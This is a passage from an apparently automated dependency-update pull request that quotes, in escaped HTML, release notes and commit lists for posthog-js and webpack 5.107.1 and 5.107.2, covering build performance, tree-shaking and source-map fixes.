\u003ccode\u003eposthog-js\u003c/code\u003e at build time but is not published to npm on its own, so a \u003ccode\u003eposthog-js\u003c/code\u003e bump is needed to actually deliver the change. (2026-05-21)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eUpdated dependencies []:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003e@​posthog/types\u003c/code\u003e\u003ca href=\"https://github.com/1\"\u003e\u003ccode\u003e@​1\u003c/code\u003e\u003c/a\u003e.374.4\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e@​posthog/core\u003c/code\u003e\u003ca href=\"https://github.com/1\"\u003e\u003ccode\u003e@​1\u003c/code\u003e\u003c/a\u003e.29.7\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eposthog-js@1.374.3\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/PostHog/posthog-js/commit/3d41c1d9dd4cecd928e5ec5b37ec16256bc95352\"\u003e\u003ccode\u003e3d41c1d\u003c/code\u003e\u003c/a\u003e chore: update versions and lockfile [version bump]\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/PostHog/posthog-js/commit/c806ccafdcc39b38e9554f8a17a8c2fbd3361dda\"\u003e\u003ccode\u003ec806cca\u003c/code\u003e\u003c/a\u003e feat: use async gzip for replay event compression (\u003ca href=\"https://redirect.github.com/PostHog/posthog-js/issues/3639\"\u003e#3639\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/PostHog/posthog-js/commit/6e8d3495d0a29076aeea5220e19e646aeb7f063f\"\u003e\u003ccode\u003e6e8d349\u003c/code\u003e\u003c/a\u003e feat(replay): expose rrweb subpath entries on posthog-js (\u003ca href=\"https://redirect.github.com/PostHog/posthog-js/issues/3655\"\u003e#3655\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/PostHog/posthog-js/commit/ec81cc61a11dac7dd79335b62f5be1a5ffa3ed77\"\u003e\u003ccode\u003eec81cc6\u003c/code\u003e\u003c/a\u003e chore: validate changeset versioning (\u003ca href=\"https://redirect.github.com/PostHog/posthog-js/issues/3647\"\u003e#3647\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/PostHog/posthog-js/commit/6d3d39fac541a8e5233fac7c905cd4101641ea0a\"\u003e\u003ccode\u003e6d3d39f\u003c/code\u003e\u003c/a\u003e chore(ci): bump pinned posthog-sdk-test-harness SHA (\u003ca href=\"https://redirect.github.com/PostHog/posthog-js/issues/3660\"\u003e#3660\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/PostHog/posthog-js/commit/b191176faac3a17d9feda46c05436e989bd0d1fc\"\u003e\u003ccode\u003eb191176\u003c/code\u003e\u003c/a\u003e chore(ci): bump pinned PostHog/.github reusable workflow SHA (\u003ca href=\"https://redirect.github.com/PostHog/posthog-js/issues/3659\"\u003e#3659\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/PostHog/posthog-js/commit/fb18a0ad5ab8cdf8ab3331a385f0d1f0ba863eaf\"\u003e\u003ccode\u003efb18a0a\u003c/code\u003e\u003c/a\u003e chore: pin github actions to sha (\u003ca href=\"https://redirect.github.com/PostHog/posthog-js/issues/3644\"\u003e#3644\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/PostHog/posthog-js/commit/a05405d0ec67988715cb31634730f95729f3f27d\"\u003e\u003ccode\u003ea05405d\u003c/code\u003e\u003c/a\u003e chore: update versions and lockfile [version bump]\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/PostHog/posthog-js/commit/18ea8b53f608607075c93bc18b29be8dfd41eb3f\"\u003e\u003ccode\u003e18ea8b5\u003c/code\u003e\u003c/a\u003e feat(node): promote flag definition cache provider types (\u003ca href=\"https://redirect.github.com/PostHog/posthog-js/issues/3642\"\u003e#3642\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/PostHog/posthog-js/commit/2e1d5f4081c98a04e6a16f57e42491911453994d\"\u003e\u003ccode\u003e2e1d5f4\u003c/code\u003e\u003c/a\u003e feat: add browser flag_keys config (\u003ca href=\"https://redirect.github.com/PostHog/posthog-js/issues/3641\"\u003e#3641\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/PostHog/posthog-js/compare/posthog-js@1.369.3...posthog-js@1.376.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `webpack` from 5.105.4 to 5.107.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack/releases\"\u003ewebpack's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.107.2\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eReduce per-file overhead in \u003ccode\u003eContextModuleFactory.resolveDependencies\u003c/code\u003e by batching \u003ccode\u003ealternativeRequests\u003c/code\u003e hook calls. Previously the hook was invoked once per file in the context (with a single-item array), paying per-call overhead (closure allocation, \u003ccode\u003eresolverFactory.get\u003c/code\u003e, intermediate arrays in \u003ccode\u003eRequireContextPlugin\u003c/code\u003e) for every file. The hook is now invoked once per directory with all matched files in one batch — \u003ccode\u003eRequireContextPlugin\u003c/code\u003e's tap already iterates the items array, so the output is unchanged. Steady-state rebuild on a 4000-file \u003ccode\u003erequire.context\u003c/code\u003e drops a further ~15 ms (after the watch-mode purge fix in the same release). (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21020\"\u003e#21020\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eInclude each external info's \u003ccode\u003eruntimeCondition\u003c/code\u003e in \u003ccode\u003eConcatenatedModule#updateHash\u003c/code\u003e so changes to a concatenated external's runtime condition invalidate persistent caches instead of slipping through with the module id alone. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21023\"\u003e#21023\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix HTML \u003ccode\u003e[contenthash]\u003c/code\u003e for referenced asset and inline-style URL changes. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21018\"\u003e#21018\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eResolve chunk-hash placeholders in chunk URLs embedded into extracted HTML. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21018\"\u003e#21018\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRemove unnecessary \u003ccode\u003e__webpack_require__\u003c/code\u003e runtime helpers in ESM library output with multi-module chunks. (by \u003ca href=\"https://github.com/xiaoxiaojx\"\u003e\u003ccode\u003e@​xiaoxiaojx\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21032\"\u003e#21032\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRewrite \u003ccode\u003eNormalModule#getSideEffectsConnectionState\u003c/code\u003e walk as an allocation-light iterative loop instead of a generator trampoline, restoring rebuild performance lost in \u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20993\"\u003e#20993\u003c/a\u003e while keeping deep import chains stack-safe. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21014\"\u003e#21014\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix runtime \u003ccode\u003eReferenceError\u003c/code\u003e on the first activation of a lazy-compiled module when \u003ccode\u003eoutput.library.type\u003c/code\u003e produces a closure-wrapped bundle (\u003ccode\u003eumd\u003c/code\u003e, \u003ccode\u003eumd2\u003c/code\u003e, \u003ccode\u003eamd\u003c/code\u003e, \u003ccode\u003eamd-require\u003c/code\u003e, \u003ccode\u003esystem\u003c/code\u003e). (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21013\"\u003e#21013\u003c/a\u003e)\u003c/p\u003e\n\u003cp\u003eExternal modules of these types reference closure-bound identifiers like \u003ccode\u003e__WEBPACK_EXTERNAL_MODULE_react__\u003c/code\u003e, supplied by the library wrapper that is generated once per chunk. When \u003ccode\u003elazyCompilation\u003c/code\u003e activates an entry or import for the first time, any external dependency the lazily-built module pulls in arrives in a hot-update chunk that lives outside the original wrapper closure, so its factory body cannot resolve the closure identifier and only a manual page refresh recovers.\u003c/p\u003e\n\u003cp\u003eThe inactive \u003ccode\u003eLazyCompilationProxyModule\u003c/code\u003e now declares statically-enumerable externals (string and object forms of \u003ccode\u003eexternals\u003c/code\u003e) as its own dependencies, so the initial entry chunk's library wrapper already exposes their closure identifiers. When activation later pulls in those externals through the lazily-compiled module, they resolve to the already-installed factories instead of throwing. Function and RegExp externals are not pre-populated because their effective request set isn't knowable up front.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFill in missing \u003ccode\u003eentryOptions\u003c/code\u003e when an async block joins an existing entrypoint. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21026\"\u003e#21026\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRelease per-child \u003ccode\u003ecodeGenerationResults\u003c/code\u003e in \u003ccode\u003eMultiCompiler\u003c/code\u003e and at \u003ccode\u003eCompiler.close\u003c/code\u003e to reduce memory retention. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21015\"\u003e#21015\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eReduce peak memory of \u003ccode\u003eSourceMapDevToolPlugin\u003c/code\u003e on large builds (closes \u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20961\"\u003e#20961\u003c/a\u003e). (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/20963\"\u003e#20963\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix slow \u003ccode\u003erequire.context()\u003c/code\u003e / dynamic \u003ccode\u003eimport()\u003c/code\u003e rebuilds in watch mode (\u003ca href=\"https://redirect.github.com/webpack/webpack/issues/13636\"\u003e#13636\u003c/a\u003e). When a file inside a watched context directory changed, \u003ccode\u003eNodeWatchFileSystem\u003c/code\u003e would call \u003ccode\u003einputFileSystem.purge(contextDir)\u003c/code\u003e. The enhanced-resolve \u003ccode\u003epurge\u003c/code\u003e implementation matches cache keys with \u003ccode\u003ekey.startsWith(contextDir)\u003c/code\u003e, so the stat cache of every file under the directory was discarded on every rebuild — \u003ccode\u003eContextModuleFactory.resolveDependencies\u003c/code\u003e then re-\u003ccode\u003estat\u003c/code\u003e-ed the whole tree on each rebuild. Single-file rebuilds on a 4000-file context now reuse the warm stat cache, dropping median rebuild from ~1260 ms to ~650 ms in a local reproduction (≈49%). For directory items that are explicitly watched contexts, \u003ccode\u003epurge\u003c/code\u003e is now called with \u003ccode\u003e{ exact: true }\u003c/code\u003e (added in \u003ccode\u003eenhanced-resolve@5.22.0\u003c/code\u003e) so only the directory's own entry is invalidated; file-level changes in the same aggregated event continue to purge file stats and the parent \u003ccode\u003ereaddir\u003c/code\u003e as before. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21020\"\u003e#21020\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.107.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eAlign the experimental HTML tokenizer with the WHATWG spec: fix offset-range bugs in the script-data, content-mode end-tag, attribute-value, and EOF states; surface tokenizer parse errors to consumers via a new \u003ccode\u003eparseError\u003c/code\u003e callback (\u003ccode\u003e\u0026quot;warning\u0026quot;\u003c/code\u003e when the tokenizer recovers and the emitted token is still well-formed, \u003ccode\u003e\u0026quot;error\u0026quot;\u003c/code\u003e when the offset range is incomplete — e.g. \u003ccode\u003eeof-in-tag\u003c/code\u003e); and add the full WHATWG named character references table so \u003ccode\u003edecodeHtmlEntities\u003c/code\u003e handles all named entities (including legacy bare forms like \u003ccode\u003e\u0026amp;AMP\u003c/code\u003e and multi-code-point entities like \u003ccode\u003e\u0026amp;NotEqualTilde;\u003c/code\u003e) with proper longest-prefix backtracking. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21000\"\u003e#21000\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eTree-shake CommonJS modules imported through a \u003ccode\u003econst NAME = require(LITERAL)\u003c/code\u003e binding when only static members of \u003ccode\u003eNAME\u003c/code\u003e are read. Previously webpack treated every export of such modules as referenced (because the bare \u003ccode\u003erequire()\u003c/code\u003e dependency reports \u003ccode\u003eEXPORTS_OBJECT_REFERENCED\u003c/code\u003e), so unused \u003ccode\u003eexports.x = ...\u003c/code\u003e assignments remained in the bundle even with \u003ccode\u003eusedExports\u003c/code\u003e enabled. The parser now forwards \u003ccode\u003eNAME.x\u003c/code\u003e / \u003ccode\u003eNAME.x()\u003c/code\u003e / \u003ccode\u003eNAME[\u0026quot;x\u0026quot;]\u003c/code\u003e accesses to the underlying \u003ccode\u003eCommonJsRequireDependency\u003c/code\u003e as referenced exports, falling back to the full exports object the moment \u003ccode\u003eNAME\u003c/code\u003e is read in any other context (passed by value, destructured later, accessed with a dynamic key, …). This brings the binding form to parity with the existing destructuring form (\u003ccode\u003econst { x } = require(...)\u003c/code\u003e). (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21003\"\u003e#21003\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix \u003ccode\u003eRangeError: Maximum call stack size exceeded\u003c/code\u003e thrown from \u003ccode\u003eHarmonyImportSideEffectDependency.getModuleEvaluationSideEffectsState\u003c/code\u003e on long linear chains of side-effect-free imports. \u003ccode\u003eNormalModule.getSideEffectsConnectionState\u003c/code\u003e previously descended through \u003ccode\u003eHarmonyImportSideEffectDependency.getModuleEvaluationSideEffectsState\u003c/code\u003e recursively, adding two stack frames per module, which overflowed V8's stack at a few thousand modules deep. The traversal is now iterative. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/20993\"\u003e#20993\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix \u003ccode\u003eNormalModuleFactory\u003c/code\u003e parser/generator types: (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/20999\"\u003e#20999\u003c/a\u003e)\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003emodule.generator.html\u003c/code\u003e now uses \u003ccode\u003eHtmlGeneratorOptions\u003c/code\u003e instead of \u003ccode\u003eEmptyGeneratorOptions\u003c/code\u003e (the \u003ccode\u003eextract\u003c/code\u003e option was hidden from the \u003ccode\u003ecreateGenerator\u003c/code\u003e / \u003ccode\u003egenerator\u003c/code\u003e hook types).\u003c/li\u003e\n\u003cli\u003eWebAssembly (\u003ccode\u003ewebassembly/async\u003c/code\u003e, \u003ccode\u003ewebassembly/sync\u003c/code\u003e) generator hooks now use \u003ccode\u003eEmptyGeneratorOptions\u003c/code\u003e instead of \u003ccode\u003eEmptyParserOptions\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eNormalModuleFactory#getParser\u003c/code\u003e / \u003ccode\u003ecreateParser\u003c/code\u003e / \u003ccode\u003egetGenerator\u003c/code\u003e / \u003ccode\u003ecreateGenerator\u003c/code\u003e are now generic over the module-type string, returning the specific parser/generator class for known types (e.g. \u003ccode\u003eJavascriptParser\u003c/code\u003e for \u003ccode\u003e\u0026quot;javascript/auto\u0026quot;\u003c/code\u003e, \u003ccode\u003eCssGenerator\u003c/code\u003e for \u003ccode\u003e\u0026quot;css\u0026quot;\u003c/code\u003e, etc.) instead of always returning the base \u003ccode\u003eParser\u003c/code\u003e / \u003ccode\u003eGenerator\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eNormalModuleCreateData\u003c/code\u003e is now generic over the module type so \u003ccode\u003eparser\u003c/code\u003e, \u003ccode\u003eparserOptions\u003c/code\u003e, \u003ccode\u003egenerator\u003c/code\u003e, and \u003ccode\u003egeneratorOptions\u003c/code\u003e are narrowed to the specific class / options for the given \u003ccode\u003etype\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eLink import bindings used inside \u003ccode\u003edefine(...)\u003c/code\u003e callbacks in ES modules. Previously, \u003ccode\u003eHarmonyDetectionParserPlugin\u003c/code\u003e skipped walking the arguments of \u003ccode\u003edefine\u003c/code\u003e calls in harmony modules, so references to imported bindings inside an inline AMD \u003ccode\u003edefine\u003c/code\u003e factory (e.g. \u003ccode\u003edefine(function () { console.log(foo); })\u003c/code\u003e) were not rewritten to their imported references and could cause \u003ccode\u003eReferenceError\u003c/code\u003e at runtime. Inner graph usage analysis is also fixed for the related pattern \u003ccode\u003econst fn = function () { foo; }; define(fn);\u003c/code\u003e. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/20990\"\u003e#20990\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eHTML-entry pipeline (\u003ccode\u003eexperiments.html\u003c/code\u003e + \u003ccode\u003eexperiments.css\u003c/code\u003e): emit \u003ccode\u003e\u0026lt;link rel=\u0026quot;stylesheet\u0026quot;\u0026gt;\u003c/code\u003e tags for CSS chunks reachable from a \u003ccode\u003e\u0026lt;script src\u0026gt;\u003c/code\u003e entry. Previously when the bundled JS imported CSS, the resulting \u003ccode\u003e.css\u003c/code\u003e file was emitted to disk but never referenced from the extracted HTML (no \u003ccode\u003e\u0026lt;link\u0026gt;\u003c/code\u003e tag), and when \u003ccode\u003esplitChunks\u003c/code\u003e extracted CSS into sibling chunks the HTML cloned the originating \u003ccode\u003e\u0026lt;script\u0026gt;\u003c/code\u003e for each one — producing \u003ccode\u003e\u0026lt;script src=\u0026quot;style.js\u0026quot;\u0026gt;\u003c/code\u003e pointing at non-existent JS filenames instead of \u003ccode\u003e\u0026lt;link rel=\u0026quot;stylesheet\u0026quot; href=\u0026quot;style.css\u0026quot;\u0026gt;\u003c/code\u003e. CSS chunks are now sorted by the entrypoint's module post-order index so the \u003ccode\u003e\u0026lt;link\u0026gt;\u003c/code\u003e tags also appear in source import order, fixing the cascade ordering issue documented in \u003ccode\u003ehtml-webpack-plugin#1838\u003c/code\u003e and \u003ccode\u003ewebpack/mini-css-extract-plugin#959\u003c/code\u003e for HTML-entry builds. \u003ccode\u003enonce\u003c/code\u003e/\u003ccode\u003ecrossorigin\u003c/code\u003e/\u003ccode\u003ereferrerpolicy\u003c/code\u003e are copied from the originating tag onto the emitted \u003ccode\u003e\u0026lt;link\u0026gt;\u003c/code\u003e. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21002\"\u003e#21002\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAllow \u003ccode\u003edevtool\u003c/code\u003e and \u003ccode\u003eSourceMapDevToolPlugin\u003c/code\u003e (or multiple \u003ccode\u003eSourceMapDevToolPlugin\u003c/code\u003e instances) to coexist on the same asset. Previously the second instance would silently skip any asset whose \u003ccode\u003einfo.related.sourceMap\u003c/code\u003e had already been set by an earlier instance, and even when it ran the asset had been rewrapped as a \u003ccode\u003eRawSource\u003c/code\u003e so no source map could be recovered — producing an empty \u003ccode\u003e.map\u003c/code\u003e file. The plugin now keeps a per-compilation stash of pristine source maps, namespaces its persistent cache entries by the options that affect output, and appends additional \u003ccode\u003erelated.sourceMap\u003c/code\u003e entries instead of overwriting them. The classic workaround of pairing \u003ccode\u003edevtool: 'hidden-source-map'\u003c/code\u003e with a \u003ccode\u003enew webpack.SourceMapDevToolPlugin({ filename: '[file].secondary.map', noSources: true })\u003c/code\u003e now produces both maps in a single build. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21001\"\u003e#21001\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack/blob/main/CHANGELOG.md\"\u003ewebpack's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e5.107.2\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eReduce per-file overhead in \u003ccode\u003eContextModuleFactory.resolveDependencies\u003c/code\u003e by batching \u003ccode\u003ealternativeRequests\u003c/code\u003e hook calls. Previously the hook was invoked once per file in the context (with a single-item array), paying per-call overhead (closure allocation, \u003ccode\u003eresolverFactory.get\u003c/code\u003e, intermediate arrays in \u003ccode\u003eRequireContextPlugin\u003c/code\u003e) for every file. The hook is now invoked once per directory with all matched files in one batch — \u003ccode\u003eRequireContextPlugin\u003c/code\u003e's tap already iterates the items array, so the output is unchanged. Steady-state rebuild on a 4000-file \u003ccode\u003erequire.context\u003c/code\u003e drops a further ~15 ms (after the watch-mode purge fix in the same release). (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21020\"\u003e#21020\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eInclude each external info's \u003ccode\u003eruntimeCondition\u003c/code\u003e in \u003ccode\u003eConcatenatedModule#updateHash\u003c/code\u003e so changes to a concatenated external's runtime condition invalidate persistent caches instead of slipping through with the module id alone. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21023\"\u003e#21023\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix HTML \u003ccode\u003e[contenthash]\u003c/code\u003e for referenced asset and inline-style URL changes. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21018\"\u003e#21018\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eResolve chunk-hash placeholders in chunk URLs embedded into extracted HTML. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21018\"\u003e#21018\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRemove unnecessary \u003ccode\u003e__webpack_require__\u003c/code\u003e runtime helpers in ESM library output with multi-module chunks. (by \u003ca href=\"https://github.com/xiaoxiaojx\"\u003e\u003ccode\u003e@​xiaoxiaojx\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21032\"\u003e#21032\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRewrite \u003ccode\u003eNormalModule#getSideEffectsConnectionState\u003c/code\u003e walk as an allocation-light iterative loop instead of a generator trampoline, restoring rebuild performance lost in \u003ca href=\"https://redirect.github.com/webpack/webpack/issues/20993\"\u003e#20993\u003c/a\u003e while keeping deep import chains stack-safe. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21014\"\u003e#21014\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix runtime \u003ccode\u003eReferenceError\u003c/code\u003e on the first activation of a lazy-compiled module when \u003ccode\u003eoutput.library.type\u003c/code\u003e produces a closure-wrapped bundle (\u003ccode\u003eumd\u003c/code\u003e, \u003ccode\u003eumd2\u003c/code\u003e, \u003ccode\u003eamd\u003c/code\u003e, \u003ccode\u003eamd-require\u003c/code\u003e, \u003ccode\u003esystem\u003c/code\u003e). (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21013\"\u003e#21013\u003c/a\u003e)\u003c/p\u003e\n\u003cp\u003eExternal modules of these types reference closure-bound identifiers like \u003ccode\u003e__WEBPACK_EXTERNAL_MODULE_react__\u003c/code\u003e, supplied by the library wrapper that is generated once per chunk. When \u003ccode\u003elazyCompilation\u003c/code\u003e activates an entry or import for the first time, any external dependency the lazily-built module pulls in arrives in a hot-update chunk that lives outside the original wrapper closure, so its factory body cannot resolve the closure identifier and only a manual page refresh recovers.\u003c/p\u003e\n\u003cp\u003eThe inactive \u003ccode\u003eLazyCompilationProxyModule\u003c/code\u003e now declares statically-enumerable externals (string and object forms of \u003ccode\u003eexternals\u003c/code\u003e) as its own dependencies, so the initial entry chunk's library wrapper already exposes their closure identifiers. When activation later pulls in those externals through the lazily-compiled module, they resolve to the already-installed factories instead of throwing. Function and RegExp externals are not pre-populated because their effective request set isn't knowable up front.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFill in missing \u003ccode\u003eentryOptions\u003c/code\u003e when an async block joins an existing entrypoint. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/webpack/webpack/pull/21026\"\u003e#21026\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRelease per-child \u003ccode\u003ecodeGenerationResults\u003c/code\u003e in \u003ccode\u003eMultiCompiler\u003c/code\u003e and at \u003ccode\u003eCompiler.close\u003c/code\u003e to reduce memory retention. (by \u003ca href=\"https://github.com/alexander-akait\"\u003e\u003ccode\u003e@​alexander-akait\u003c/code\u003e\u003c/a\u003e in \u003ca 